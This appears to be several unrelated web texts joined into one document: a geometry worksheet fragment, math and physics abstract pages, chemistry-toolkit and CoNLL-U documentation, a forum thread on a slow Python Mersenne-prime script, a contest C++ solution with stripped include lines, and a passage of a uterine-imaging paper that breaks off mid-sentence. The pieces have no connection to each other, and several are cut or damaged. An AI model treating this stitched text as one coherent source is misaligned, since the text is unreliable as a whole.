blank. $x, y$, and $z$ are real numbers. 1. Symmetric: If $x = 3$, then _________. 2. Distributive: If $4(3x - 8)$, then _________. 3. Transitive: If $y = 12$ and $x = y$, then _________. 4. Symmetric: If $x + y = y + z$, then _________. 5. Transitive: If $AB = 5$ and $AB = CD$, then _________. 6. Substitution: If $x = y - 7$ and $x = z + 4$, then _________. 7. Given points $E, F$, and $G$ and $EF = 16$, $FG = 7$ and $EG = 23$. Determine if $E, F$ and $G$ are collinear. 8. Given points $H, I$ and $J$ and $HI = 9, IJ = 9$ and $HJ = 16$. Are the three points collinear? Is $I$ the midpoint? 9. If $m \angle KLM = 56^\circ$ and $m \angle KLM + m \angle NOP = 180^\circ$, explain how $\angle NOP$ must be an obtuse angle. Fill in the blanks in the proofs below. 1. Given: $\angle ABC \cong DEF\!\\\angle GHI \cong \angle JKL$ $\;$ Prove: $m \angle ABC + m \angle GHI = m \angle DEF + m \angle JKL$ Statement Reason 1. Given 2. $m \angle ABC = m \angle DEF\\m \angle GHI = m \angle JKL$ 4. $m \angle ABC + m \angle GHI = m \angle DEF + m \angle JKL$ 1. Given: $M$ is the midpoint of $\overline{AN}$. $N$ is the midpoint $\overline{MB}$ Prove: $AM = NB$ Statement Reason 1. Given 2. Definition of a midpoint 3. $AM = NB$ Use the diagram to answer questions 20-25. 1. Name a right angle. 2. Name two perpendicular lines. 3. Given that $EF = GH$, is $EG = FH$ true? Explain your answer. 4. Is $\angle CGH$ a right angle? Why or why not? 5. Using what is given in the picture AND $\angle EBF \cong \angle HCG$, prove $\angle ABF \cong \angle DCG$. Write a two-column proof. 6. Using what is given in the picture AND $AB = CD$, prove $AC = BD$. Write a two-column proof. Use the diagram to answer questions 26-32. Which of the following must be true from the diagram? Take each question separately, they do not build upon each other. 1. $\overline{AD} \cong \overline{BC}$ 2. $\overline{AB} \cong \overline{CD}$ 3. $\overline{CD} \cong \overline{BC}$ 4. $\overline{AB} \bot \overline{AD}$ 5. $ABCD$ is a square 6. $\overline{AC}$ bisects $\angle DAB$ 7. Write a two-column proof. Given: Picture above and $\overline{AC}$ bisects $\angle DAB$ Prove: $m \angle BAC = 45^\circ$ 8. Draw a picture and write a two-column proof. Given: $\angle 1$ and $\angle 2$ form a linear pair and $m \angle 1=m \angle 2$. Prove: $\angle 1$ is a right angle 1. First, subtract 3 from both sides and then divide both sides by 2. $x = 3$ 2. If 2 angles are a linear pair, then their sum is $180^\circ$. Law of Syllogism. Feb 23, 2012 Oct 07, 2015
# American Institute of Mathematical Sciences June  2010, 28(2): 591-606. doi: 10.3934/dcds.2010.28.591 ## Sets with finite perimeter in Wiener spaces, perimeter measure and boundary rectifiability 1 Scuola Normale Superiore, p.za dei Cavalieri 7, Pisa, I-56126 2 Dipartimento di Matematica, Università di Ferrara, via Machiavelli 35, Ferrara, I-44121, Italy 3 Dipartimento di Matematica "Ennio De Giorgi”, Università del Salento, C.P. 193, Lecce, I-73100, Italy Received  January 2010 Revised  April 2010 Published  April 2010 We discuss some recent developments of the theory of $BV$ functions and sets of finite perimeter in infinite-dimensional Gaussian spaces. In this context the concepts of Hausdorff measure, approximate continuity, rectifiability have to be properly understood. After recalling the known facts, we prove a Sobolev-rectifiability result and we list some open problems. Citation: Luigi Ambrosio, Michele Miranda jr., Diego Pallara. Sets with finite perimeter in Wiener spaces, perimeter measure and boundary rectifiability. Discrete & Continuous Dynamical Systems - A, 2010, 28 (2) : 591-606. doi: 10.3934/dcds.2010.28.591 [1] Alessandro Ferriero, Nicola Fusco. A note on the convex hull of sets of finite perimeter in the plane. Discrete & Continuous Dynamical Systems - B, 2009, 11 (1) : 103-108. doi: 10.3934/dcdsb.2009.11.103 [2] Xing Wang, Chang-Qi Tao, Guo-Ji Tang. Differential optimization in finite-dimensional spaces. Journal of Industrial & Management Optimization, 2016, 12 (4) : 1495-1505. doi: 10.3934/jimo.2016.12.1495 [3] Linda Beukemann, Klaus Metsch, Leo Storme. On weighted minihypers in finite projective spaces of square order. Advances in Mathematics of Communications, 2015, 9 (3) : 291-309. doi: 10.3934/amc.2015.9.291 [4] Alexander A. Davydov, Massimo Giulietti, Stefano Marcugini, Fernanda Pambianco. Linear nonbinary covering codes and saturating sets in projective spaces. Advances in Mathematics of Communications, 2011, 5 (1) : 119-147. doi: 10.3934/amc.2011.5.119 [5] Steve Hofmann, Dorina Mitrea, Marius Mitrea, Andrew J. Morris. Square function estimates in spaces of homogeneous type and on uniformly rectifiable Euclidean sets. Electronic Research Announcements, 2014, 21: 8-18. doi: 10.3934/era.2014.21.8 [6] Jeong-Yup Lee, Boris Solomyak. On substitution tilings and Delone sets without finite local complexity. Discrete & Continuous Dynamical Systems - A, 2019, 39 (6) : 3149-3177. doi: 10.3934/dcds.2019130 [7] Natalie Priebe Frank, Lorenzo Sadun. Topology of some tiling spaces without finite local complexity. Discrete & Continuous Dynamical Systems - A, 2009, 23 (3) : 847-865. doi: 10.3934/dcds.2009.23.847 [8] Piotr Gwiazda, Piotr Orlinski, Agnieszka Ulikowska. Finite range method of approximation for balance laws in measure spaces. Kinetic & Related Models, 2017, 10 (3) : 669-688. doi: 10.3934/krm.2017027 [9] Harald Fripertinger. The number of invariant subspaces under a linear operator on finite vector spaces. Advances in Mathematics of Communications, 2011, 5 (2) : 407-416. doi: 10.3934/amc.2011.5.407 [10] Sophie Guillaume. Evolution equations governed by the subdifferential of a convex composite function in finite dimensional spaces. Discrete & Continuous Dynamical Systems - A, 1996, 2 (1) : 23-52. doi: 10.3934/dcds.1996.2.23 [11] Gabriel Fuhrmann, Jing Wang. Rectifiability of a class of invariant measures with one non-vanishing Lyapunov exponent. Discrete & Continuous Dynamical Systems - A, 2017, 37 (11) : 5747-5761. doi: 10.3934/dcds.2017249 [12] Klaus Metsch. A note on Erdős-Ko-Rado sets of generators in Hermitian polar spaces. Advances in Mathematics of Communications, 2016, 10 (3) : 541-545. doi: 10.3934/amc.2016024 [13] Liangwei Wang, Jingxue Yin, Chunhua Jin. $\omega$-limit sets for porous medium equation with initial data in some weighted spaces. Discrete & Continuous Dynamical Systems - B, 2013, 18 (1) : 223-236. doi: 10.3934/dcdsb.2013.18.223 [14] Annibale Magni, Matteo Novaga. A note on non lower semicontinuous perimeter functionals on partitions. Networks & Heterogeneous Media, 2016, 11 (3) : 501-508. doi: 10.3934/nhm.2016006 [15] Annalisa Cesaroni, Matteo Novaga. Volume constrained minimizers of the fractional perimeter with a potential energy. Discrete & Continuous Dynamical Systems - S, 2017, 10 (4) : 715-727. doi: 10.3934/dcdss.2017036 [16] Serena Dipierro, Alessio Figalli, Giampiero Palatucci, Enrico Valdinoci. Asymptotics of the $s$-perimeter as $s\searrow 0$. Discrete & Continuous Dynamical Systems - A, 2013, 33 (7) : 2777-2790. doi: 10.3934/dcds.2013.33.2777 [17] Peter Müller, Gábor P. Nagy. On the non-existence of sharply transitive sets of permutations in certain finite permutation groups. Advances in Mathematics of Communications, 2011, 5 (2) : 303-308. doi: 10.3934/amc.2011.5.303 [18] Tanja Eisner, Pavel Zorin-Kranich. Uniformity in the Wiener-Wintner theorem for nilsequences. Discrete & Continuous Dynamical Systems - A, 2013, 33 (8) : 3497-3516. doi: 10.3934/dcds.2013.33.3497 [19] B. S. Lee, Arif Rafiq. Strong convergence of an implicit iteration process for a finite family of Lipschitz $\phi -$uniformly pseudocontractive mappings in Banach spaces. Numerical Algebra, Control & Optimization, 2014, 4 (4) : 287-293. doi: 10.3934/naco.2014.4.287 [20] Viorel Barbu, Ionuţ Munteanu. Internal stabilization of Navier-Stokes equation with exact controllability on spaces with finite codimension. Evolution Equations & Control Theory, 2012, 1 (1) : 1-16. doi: 10.3934/eect.2012.1.1 2018 Impact Factor: 1.143
# OENetCharge¶ int OENetCharge(const OEMolBase &mol) Determines the net charge on a molecule. If the molecule has specified partial charges, see OEChem‘s OEHasPartialCharges function, this function returns the sum of the partial charges rounded to an integer. Otherwise this function returns the sum of the formal charges on each atom of the molecule.
x ## 留言板 引用本文: Citation: ## Tag Z boson jets via convolutional neural networks Li Jing, Sun Hao PDF HTML • #### 摘要 高能物理中喷注识别任务是从背景中识别出感兴趣的特定信号, 这些信号对于在大型强子对撞机上发现新的粒子, 或者新的过程都有着非常重要的意义. 量能器中产生的能量沉积可以看做是对喷注的一种拍照, 分析这样产生的数据在机器学习领域中属于一个典型的视觉识别任务. 基于喷注图片, 本文探索了利用卷积神经网络(convolutional neural networks, CNNs)识别量子色动力学背景下的Z玻色子喷注, 并与传统的增强决策树(boosted decision trees, BDTs)方法进行了对比. 在本文利用的输入前提下, 三种相关的性能参数表明, CNN比BDT带来了约1.5倍的效果提升. 除此之外, 通过最优与最差的喷注图与混淆矩阵, 说明了CNN通过训练学习到的内容与整体识别能力. #### Abstract The jet tagging task in high-energy physics is to distinguish signals of interest from the background, which is of great importance for the discovery of new particles, or new processes, at the large hadron collider. The energy deposition generated in the calorimeter can be seen as a kind of picture. Based on this notion, tagging jets initiated by different processes becomes a classic image classification task in the computer vision field. We use jet images as the input built on high dimensional low-level information, energy-momentum four-vectors, to explore the potential of convolutional neural networks (CNNs). Four models of different depths are designed to make the best underlying useful features of jet images. Traditional multivariable method, boosted decision tree (BDT), is used as a baseline to determine the performance of networks. We introduce four observable quantities into BDTs: the mass, transverse momenta of fat jets, the distance between the leading and subleading jets, and N-subjettiness. Different tree numbers are adopted to build three kinds of BDTs, which is intended to have variable classifying abilities. After training and testing, the results show that the CNN 3 is the neatest and most efficient network under the design of stacking convolutional layers. Deepening the model could improve the performance to a certain extent but it is unable to work all the time. The performances of all BDTs are almost the same, which is possibly due to a small number of input observable types. The performance metrics show that the CNNs outperform the BDTs: the background rejection efficiency increases up to 150% at 50% signal efficiency. Besides, after inspecting the best and the worst samples, we conclude the characteristics of jets initiated by different processes: jets obtained by Z boson decays tend to concentrate in the center of jet images or have a clear differentiable substructure; the substructures of jets from general quantum chromodynamics processes have more random forms and not only just have two subjets. As the final step, the confusion matrix of the CNN 3 indicate that it comes to be kind of conservative. Exploring the way of keeping the balance between conservative and radical is our goal in the future work. #### 作者及机构信息 ###### 通信作者: 孙昊, [email protected] • 基金项目: 国家自然科学基金(批准号: 11675033, 12075043)资助的课题 #### Authors and contacts ###### Corresponding author: Sun Hao, [email protected] • Funds: Project supported by the National Natural Science Foundation of China (Grant Nos. 11675033, 12075043) #### 施引文献 • 图 1  (a)信号平均喷注图; (b)背景平均喷注图; 横坐标$\eta$代表赝快度, 纵坐标代表方位角$\phi$. Fig. 1.  (a) Signal average jet image; (b) background average jet image. $\eta$ and $\phi$ represent pseudo-rapidity and azimuth respectively 图 2  CNN 3结构示意图, 产生这张图片的程序来自https://github.com/gwding/draw_convnet Fig. 2.  Architecture of the CNN 3. This figure was generated by adapting the code from https://github.com/gwding/draw_convnet. 图 3  (a)胖喷注的质量分布; (b)胖喷注的横向动量分布; (c)胖喷注含有的首要与次要喷注的距离分布; (d) N-subjettiness ${\tau }_{21}$的分布 Fig. 3.  (a) Mass distribution of fat jets; (b) transverse momentum distribution of fat jets; (c) distribution of distance between leading and subleading subjets; (d) distribution of N-subjettiness ${\tau }_{21}$. 图 4  不同模型的ROC曲线 Fig. 4.  ROC curves of different models. 图 5  CNN 3信号神经元对于信号(橘色)与背景(蓝色)的输出分布 Fig. 5.  Distribution of the signal neuron of the CNN 3 on signal and background samples. 图 6  最优与最差的信号喷注图 Fig. 6.  The best and the worst signal jet images. 图 7  最优与最差的背景喷注图 Fig. 7.  The best and the worst background jet images. 图 8  CNN 3在测试集上的混淆矩阵, 其中纵坐标代表喷注图的真实类别, 横坐标代表模型预测的类别 Fig. 8.  Confusion matrix of the CNN 3 on the test set. The true label is on the vertical axis, and the predicted label in on the horizontal axis. • 文章访问数:  2173 • PDF下载量:  40 • 被引次数: 0 ##### 出版历程 • 收稿日期:  2020-09-18 • 修回日期:  2020-11-13 • 上网日期:  2021-03-06 • 刊出日期:  2021-03-20 ## 识别Z玻色子喷注的卷积神经网络方法 • 大连理工大学物理学院, 大连 116024 • ###### 通信作者: 孙昊, [email protected] 基金项目: 国家自然科学基金(批准号: 11675033, 12075043)资助的课题 /
CoNLL-U format The most common way to store dependency structures is the CoNLL format. Several extensions were proposed and we describe here the one which is used by Grew, known as CoNLL-U format defined in the Universal Dependency project. For a sentence, some metadata are given in lines beginning by #. The rest of the lines described the tokens of the structure. Tokens lines contain 10 fields, separated by tabulations. The file n01118003.conllu is an example of CoNLL-U data taken form the corpus UD_English-PUD (version 2.6). # newdoc id = n01118 # sent_id = n01118003 # text = Drop the mic. 1 Drop drop VERB VB VerbForm=Inf 0 root 0:root _ 2 the the DET DT Definite=Def|PronType=Art 3 det 3:det _ 3 mic mic NOUN NN Number=Sing 1 obj 1:obj SpaceAfter=No 4 . . PUNCT . _ 1 punct 1:punct _ We explain here how Grew deals with the 10 fields if CoNLL-U files: 1. ID. This field is a number used as an identifier for the corresponding lexical unit (LU). 2. FORM. The phonological form of the LU. In Grew, the value of this field is available through a feature named form (for backward compatibility, the keyword phon can also be used instead of form). 3. LEMMA. The lemma of the LU. In Grew, this corresponds to the feature lemma. 4. UPOS. The field upos (for backward compatibility, cat can also be used to refer to this field). 5. XPOS. The field xpos (for backward compatibility, pos can also be used to refer to this field). 6. FEATS. List of morphological features. 7. HEAD. Head of the current word, which is either a value of ID or 0 for the root node. 8. DEPREL. Dependency relation to the HEAD (root iff HEAD = 0). 9. DEPS. (UD only) Enhanced dependency graph in the form of a list of head-deprel pairs. In Grew, these relations are encoded with the features enhanced=yes 10. MISC. Any other annotation. In Grew, annotation of the field are accessible like morphological features if the FEATS column. Note that the same format is very often use to describes dependency syntax corpora. In these cases, a set of sentences is described in the same file using the same convention as above and a blank line as separator between sentences. It is also requires that the sent_id metadata is unique for each sentence in the file. In practice, it may be useful to deal explicitly with the root relation (for instance, if some rewriting rule is designed to change the root of the structure). To allow this, when reading CoNLL-U format Grew also creates a node at position 0 and link it with the root relation to the linguistic root node of the sentence. The example above then produce the 5 nodes graphs below: In Grew nodes, the fields 2, 3, 4 and 5 of CoNLL-U structure are considered as features with the following feature names. CoNLL-U field 2 3 4 5 Name form lemma upos xpos For instance • matching the word ispattern { N [form="is"] } • matching the lemma bepattern { N [lemma="be"] } In older versions of Grew (before the definition of the CoNLL-U format), the fields 2, 4 and 5 where accessible with the names phon, cat and pos respectively. To have a backward compatibility and uniform handling of these fields, the names phon, cat and pos are replaced at parsing time by form, upos and xpos. As a consequence, it is impossible to use both phon and form in the same system. We highly recommend to use only the form feature in this setting. Of course, the same observation applies to cat and upos (upos should be prefered) and to pos and xpos (xpos should be chosen). Additional features textform and wordform In order to deal with several places where text data present in the original sentence and the corresponding linguistic unit are different, a systematic use of the two features textform and wordform was proposed in #683. The two fields are built from CoNLL-U data in the following way: 1. If a multiword token i-j is declared: • the textform of the first token is the FORM field of the multiword token • the textform of each other token is _ 1. If the token is an empty node (exists only in EUD): • textform=_ and wordform=__EMPTY__ 1. For each token without textform feature, the textform is set to the FORM field value 2. For each token without wordform feature, the wordform is set to the FORM field value ⚠️ In places where wordform should be different from FORM field, this should be expressed in the data with an explicit wordform feature. This includes: • lowercased form of initial word or potentially other words in the sentence • typographical or orthographical errors • token linked by a goeswith relation See few examples in SUD_French-GSD .
mersenneforum.org "Genius" needed to speed up this not-even-a-sieve in Python but he did not succeed Register FAQ Search Today's Posts Mark Forums Read 2018-05-16, 18:51   #1 ONeil Dec 2017 24·3·5 Posts "Genius" needed to speed up this not-even-a-sieve in Python but he did not succeed I need help regarding a Mersenne Prime Sieve which I edited to perform this task; this code is from a perfect number generator. The problem is the program slows down at 11213 in python. Can anyone offer some speed enhancements for this sieve in Python? The output starts out like this. Quote: 2 3 5 7 13 17 19 31 61 89 107 127 521 607 1279 2203 2281 3217 4253 4423 9689 9941 11213 Code: from itertools import count def postponed_sieve(): # postponed sieve, by Will Ness yield 2; yield 3; yield 5; yield 7; # original code David Eppstein, sieve = {} # Alex Martelli, ActiveState Recipe 2002 ps = postponed_sieve() # a separate base Primes Supply: p = next(ps) and next(ps) # (3) a Prime to add to dict q = p*p # (9) its sQuare for c in count(9,2): # the Candidate if c in sieve: # c's a multiple of some base prime s = sieve.pop(c) # i.e. a composite ; or elif c < q: yield c # a prime continue else: # (c==q): # or the next base prime's square: s=count(q+2*p,2*p) # (9+6, by 6 : 15,21,27,33,...) p=next(ps) # (5) q=p*p # (25) for m in s: # the next multiple if m not in sieve: # no duplicates break sieve[m] = s # original test entry: ideone.com/WFv4f def prime_sieve(): # postponed sieve, by Will Ness yield 2; yield 3; yield 5; yield 7; # original code David Eppstein, sieve = {} # Alex Martelli, ActiveState Recipe 2002 ps = postponed_sieve() # a separate base Primes Supply: p = next(ps) and next(ps) # (3) a Prime to add to dict q = p*p # (9) its sQuare for c in count(9,2): # the Candidate if c in sieve: # c’s a multiple of some base prime s = sieve.pop(c) # i.e. a composite ; or elif c < q: yield c # a prime continue else: # (c==q): # or the next base prime’s square: s=count(q+2*p,2*p) # (9+6, by 6 : 15,21,27,33,...) p=next(ps) # (5) q=p*p # (25) for m in s: # the next multiple if m not in sieve: # no duplicates break sieve[m] = s # original test entry: ideone.com/WFv4f def mod_mersenne(n, prime, mersenne_prime): while n > mersenne_prime: n = (n & mersenne_prime) + (n >> prime) if n == mersenne_prime: return 0 return n def is_mersenne_prime(prime, mersenne_prime): s = 4 for i in range(prime - 2): s = mod_mersenne((s*s - 2), prime, mersenne_prime) return s == 0 def calculate_perfects(): yield(2) primes = prime_sieve() next(primes) #2 is barely even a prime for prime in primes: if is_mersenne_prime(prime, 2**prime-1): yield(prime) if __name__ == '__main__': for perfect in calculate_perfects(): print(perfect) #edited by Tom E.O'Neil to find Mprimes 2018-05-17, 21:19 #2 ONeil   Dec 2017 24×3×5 Posts you can see it in action here: Hit run once its done loading. https://repl.it/@TommyONeil/HumongousRubberyElements Last fiddled with by Uncwilly on 2018-05-17 at 22:10 Reason: Made link unclickable. 2018-05-17, 22:11 #3 Uncwilly 6809 > 6502     """"""""""""""""""" Aug 2003 101×103 Posts 32·1,019 Posts I have again made a link of your's, not a hyperlink. The user needs to be more involved before you your code on their machine. 2018-05-17, 23:33   #4 ONeil Dec 2017 111100002 Posts Quote: Originally Posted by Uncwilly I have again made a link of your's, not a hyperlink. The user needs to be more involved before you your code on their machine. Hi Uncwilly this is not referenced from my site. It resides at repl.it. Is there anyway you could relink? Thanks 2018-05-18, 02:02   #5 Uncwilly 6809 > 6502 """"""""""""""""""" Aug 2003 101×103 Posts 217238 Posts Quote: Originally Posted by ONeil Hi Uncwilly this is not referenced from my site. It resides at repl.it. Is there anyway you could relink? Thanks Nope. I don't care where you placed the code. It is code that you wrote. You want to have users run it from their machine. There needs to be more user interaction before the code runs. Links to zip's or to pages that have a link to the files are ok. Linking directly to an exe or to page that runs code is not ok. When I previously told you about this you failed to understand where problems could pop up. 2018-05-18, 19:26 #6 nordi   Dec 2016 2×33 Posts The first step would be to know which part of your code needs to be optimized. Use Python's profiler to figure out where your code spends most of its time, then focus on that code. 2018-05-18, 19:28 #7 rogue     "Mark" Apr 2003 Between here and the 616210 Posts I suggest that you learn a language like C if you want speed. 2018-05-19, 05:48 #8 LaurV Romulan Interpreter     Jun 2011 Thailand 3×17×179 Posts @op: additional of what other people told you in the past about demonstrating your knowledge (or... ignorance) not only about math but also about programming, here you also proved that you don't know what a "sieve" is. This is not a sieve, it is an (extremely slow) program that finds mersenne primes. You use some wheel to find primes, then do LL test for each prime to see if the corespondent mersenne is itself prime. But you can not use the information to "sieve" anything with it. It should be nice if you could "sieve" the prime exponents in such a way to avoid doing at least few percents of the LL tests, even one percent of them, then THAT should have been A RESULT. Please note the uppercase letters. This what you show is crap. Last fiddled with by LaurV on 2018-05-19 at 05:50 2018-05-19, 08:36   #9 ONeil Dec 2017 24×3×5 Posts Quote: Originally Posted by LaurV @op: additional of what other people told you in the past about demonstrating your knowledge (or... ignorance) not only about math but also about programming, here you also proved that you don't know what a "sieve" is. This is not a sieve, it is an (extremely slow) program that finds mersenne primes. You use some wheel to find primes, then do LL test for each prime to see if the corespondent mersenne is itself prime. But you can not use the information to "sieve" anything with it. It should be nice if you could "sieve" the prime exponents in such a way to avoid doing at least few percents of the LL tests, even one percent of them, then THAT should have been A RESULT. Please note the uppercase letters. This what you show is crap. I maybe ignorant, but at least I'm trying to find Mersenne Primes. 2018-05-19, 09:28   #10 retina Undefined "The unspeakable one" Jun 2006 My evil lair 2·34·37 Posts Quote: Originally Posted by ONeil I maybe ignorant, but at least I'm trying to find Mersenne Primes. You are trying to reinvent the wheel. There is nothing wrong with reinventing the wheel, but first you have to determine what is wrong with the current wheel, and then improve on that. So far all you have done is make the same wheel in a less efficient manner. You have not put in any new concepts or designs, yet. You have implemented the well known LL test in a scripting language. We have all done that at some point just to get a feel for how things work. But it is not something important enough to post to a public board and expect everyone else to "improve" it for you. If you are really serious about it, learn about FFT and/or NTT (or preferably invent a new faster method) and implement the test in optimised assembly on your favourite high-performance CPU. THEN you will get some attention for doing something important. 2018-05-19, 11:46   #11 science_man_88 "Forget I exist" Jul 2009 Dumbassville 20C016 Posts Quote: Originally Posted by ONeil I maybe ignorant, but at least I'm trying to find Mersenne Primes. y/k+(y-1)/(2kp)=1 iff 2p+1 divides 2kp+1 true or false. Similar Threads Thread Thread Starter Forum Replies Last Post Shen Information & Answers 4 2017-01-05 04:49 robert44444uk Software 55 2009-08-12 06:39 beyastard Software 55 2009-07-29 12:51 MooooMoo Twin Prime Search 9 2007-01-01 21:13 Clyde83 Hardware 26 2006-08-21 10:33 All times are UTC. The time now is 20:12. Fri Jan 15 20:12:00 UTC 2021 up 43 days, 16:23, 0 users, load averages: 2.35, 2.37, 2.39
# SGU 127 - Telephone directory ## Description CIA has decided to create a special telephone directory for its agents. The first 2 pages of the directory contain the name of the directory and instructions for agents, telephone number records begin on the third page. Each record takes exactly one line and consists of 2 parts: the phone number and the location of the phone. The phone number is 4 digits long. Phone numbers cannot start with digits 0 and 8. Each page of the telephone directory can contain not more then $K$ lines. Phone numbers should be sorted in increasing order. For the first phone number with a new first digit, the corresponding record should be on a new page of the phone directory. You are to write a program, that calculates the minimal number P pages in the directory. For this purpose, CIA gives you the list of numbers containing $N$ records, but since the information is confidential, without the phones locations. ## Input The first line contains a natural number $K$ ($0 < K < 255$) - the maximum number of lines that one page can contain. The second line contains a natural $N$ ($0 < N < 8000$) - number of phone numbers supplied. Each of following $N$ lines contains a number consisting of 4 digits - phone numbers in any order, and it is known, that numbers in this list cannot repeat. ## Output First line should contain a natural number $P$ - the number of pages in the telephone directory. ## Sample Input 1 2 3 4 5 6 7 8 9 10 11 12 5 10 1234 5678 1345 1456 1678 1111 5555 6789 6666 5000 ## Sample Output 1 5 ## Solution 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 #include #include using namespace std; const int MAX = 16; const int HEX = 1000; int K, N; int pData[MAX]; int main() { while(cin >> K >> N) { int nTmp, ans = 0; for(int i = 1; i <= N; i++) { cin >> nTmp; pData[nTmp / HEX]++; } for(int i = 1; i <= 9; i++) { ans += pData[i] / K + (pData[i] % K != 0); } cout << ans + 2 << endl; } return 0; }
## Introduction Two essential challenges in obstetrics worldwide are arrest of labor and preterm birth. Approximately 29% of women deliver via cesarean1, the majority of which are performed for labor arrest2. Cesarean deliveries increase the risks of maternal morbidity and neonatal respiratory morbidity compared to vaginal delivery3. Preterm birth occurs in 10.6% of women globally4, with increased infant risks of mortality before 5 years of age5, adverse long-term neurodevelopmental outcomes6, and an increased economic burden on the family and society7. Accurately assessing and interpreting uterine contractions is essential for diagnosing both labor dysfunction and preterm labor. In current clinical practice, overall signals generated by uterine contractions are measured qualitatively via tocodynamometry (TOCO) or quantitatively via an invasive intrauterine pressure catheter (IUPC)8. Previous studies have shown that these methods have limited ability to distinguish between women who will respond to induction/oxytocin augmentation and deliver vaginally and those that require cesarean9. Particularly, previous studies found that TOCO cannot identify patients who are in labor, at term or preterm10,11. In addition, between 30 and 50% of subjects diagnosed with preterm contractions go on to deliver at term12. Therefore, a better method capable of noninvasively imaging and quantifying uterine contractions is needed to address these clinical challenges. To enable safe, noninvasive monitoring of uterine contractions, we recently developed a new imaging modality, electromyometrial imaging (EMMI), which noninvasively images the electrical properties of uterine contractions at high spatial and temporal resolution up to 2 kHz in sheep13,14,15. We demonstrated and validated that EMMI could accurately map electrical activity onto the entire three-dimensional (3D) uterine surface by comparing uterine electrical signals derived by EMMI from the body surface measurements (up to 192 electrodes) to those measured directly from the uterine surface in sheep13. Moreover, using the sheep model, experimental simulation studies mimicking noise contaminations anticipated in a clinical environment demonstrated that the electrical noise error within physiological ranges has a minor effect on EMMI accuracy14,15. Herein, we describe the development of the human EMMI system, for use in women in labor. This human EMMI system was employed to robustly image the 3D electrical activation patterns of uterine contractions from nulliparous and multiparous subjects in the active first stage of labor and demonstrates that EMMI can noninvasively characterize the initiation and dynamics of uterine electrical activation during uterine labor contractions. EMMI 3D maps and indices provide new insights into human myometrial electrical maturation, which is the development of the capacity of the uterus to appropriately initiate and conduct electrical signals across the myometrium. Thus EMMI’s future clinical use will better characterize labor progression and facilitate labor management. ## Results ### Development and implementation of the human EMMI system The human EMMI system incorporates subject-specific body-uterus geometry and multiple channel electrical measurements (up to 192 electrodes) from the body surface to reconstruct complete electrical activities in sequential frames across the 3D uterus. In this study, human EMMI is performed on term labor subjects in three steps. First, a subject at ~37 weeks’ gestation undergoes an MRI scan while wearing up to 24 MRI patches containing up to 192 MRI-compatible fiducial markers around the body surface (Fig. 1a). Second, in the first stage of labor, when cervical dilation is at least 3 cm, and regular contractions are observed from the TOCO monitor, customized pin-type electrode patches are applied to the same locations on the body surface as the MRI fiducial markers. Because clinical devices such as a TOCO monitor and a fetal monitor must be applied to the abdomen to guide clinical decisions, the locations of the electrode patches were adjusted. To locate the electrode positions on an individual basis, an optical 3D scanner is used to record the actual electrode positions (Fig. 1b). Third, the subject undergoes body surface electrical recording (Fig. 1c). Each recording lasts ~15 minutes, and four recordings (up to one-hour total) are conducted for each subject in this study. The temporal sampling rate is 2048 Hz. Raw data of MR images, optical 3D scanning, and body surface electromyograms (EMG) are preprocessed to generate a subject-specific body-uterus geometry (Fig. 1d) and body surface potential maps over the body surface (Fig. 1d). The body-uterus geometry includes the coordinates of the body surface electrode locations (blue dots in Fig. 1d) and the discretized uterine surface site locations (See body-uterus geometry construction in Methods). Filtering and artifact removal is applied to the raw EMG recording to improve the signal-to-noise ratio (See EMG signal preprocessing in Methods). The Method of fundamental solutions16 was employed to solve the three-dimensional Cauchy problem to generate uterine potential maps (electrical activity distribution on the uterine surface as a function of time every 10 milliseconds, Fig. 1f). These potential maps are essentially a 4D time-series data set: electrograms (Fig. 1g, D time series data over the entire recording period) at multiple sites on the uterine surface in 3D. During a contraction, we determine the uterine electrical activation times by measuring the start times of uterine electrogram burst (UEB) at each uterine surface site, which will be used to form the isochrone map (Fig. 1h). In the isochrone map, warm colors denote regions of the uterus that are electrically activated earlier during a contraction, cool colors denote regions that are activated later, and gray regions that are inactivated. As shown in Fig. 1g and Fig. 1h, the EMMI uterine surface electrograms reflect the local electrical activities. For example, in Fig. 1g, the electrogram on the right has a UEB (where UEBs can be detected above the baseline at an SNR > 5 Decibels) that maps to a site (marked with a plus sign in Fig. 1h) in the isochrone map near the region of the uterus that is first activated. In contrast, the electrogram on the left does not show a UEB and maps to a site (marked with an asterisk) in the isochrone map that showed no electrical activity during the contraction. EMMI system (MRI scanner, optical 3D scanner, and electrode patches) is described in detail in the Methods section. ### Noninvasive imaging of human labor contractions A body surface EMG measured from the body surface of one representative subject (Subject #2) is shown in Fig. 2a. One recording segment from ~18th to 41st second was magnified. Figure 2b through Fig. 2e show sequential potential maps on the body surface and uterine surface in the anterior view in the time windows labeled as b, c, d, and e in Fig. 2a, respectively. At each indicated time window, the body surface potential maps (body in Fig. 2b) were generated from the multichannel body surface electrode measurements. In comparison, the uterine surface potential maps (uterus in Fig. 2b) were reconstructed by EMMI. Unlike conventional EMG techniques in that the electrical activities are measured from the body surface, EMMI incorporates the subject-specific body-uterus geometry to generate sequential potential maps across the entire 3D uterine surface with high temporal resolution. The EMMI uterine surface potential maps enable noninvasive characterization of the electrical activities distributed over the entire uterine surface of a subject, and allow the detection of local electrical activities in the myometrium with high spatial resolution. Currently, the uterine surfaces consist of 320 vertices evenly, and the spatial resolution is ~2.5 cm. The 4D spatial-temporal uterine surface potential map imaged by EMMI (in Figs. 2b through 2e) reveals the evolution of phase and magnitude inside a UEB. The uterine potential map can be reorganized into multichannel uterine surface electrograms based on the spatial locations on the 3D uterine surface. Each EMMI uterine surface electrogram reflects the local electrical activities of one uterine site. Based on the EMMI uterine electrograms during a uterine contraction, we define the electrical activation on the uterine surface by the initiation of a UEB. The term “uterine electrical activation time” or just “activation time” is used here to refer to the initiation time of the UEB. For the same representative subject shown in Fig. 2, simultaneous TOCO signal and five representative uterine surface electrograms (A–E in Fig. 3b) from five uterine surface sites (Fig. 3d) during two consecutive uterine contractions were shown in Fig. 3a, b, respectively. For each EMMI uterine surface electrogram, UEBs were detected (Supplementary Fig. 2), labeled by the upward red step lines, and overlaid on the electrograms. The rising edge of the red step line indicates the activation time during the contraction (green arrows). During the first uterine contraction, uterine surface electrograms from sites A through D demonstrated clear UEBs, suggesting that uterine sites A to D were electrically activated. In comparison, no UEB was detected in the uterine electrogram from site E, indicating that the myometrium around site e was inactive. Thus the entire myometrium was not electrically active and contributed to the uterine contractions. Inspecting all uterine surface sites, the earliest activation and the latest activation times can be detected and are marked by the dashed black vertical lines in Fig. 3a, b. EMMI uterine surface electrograms also suggest that the activation sequence among different uterine sites can change from one contraction to 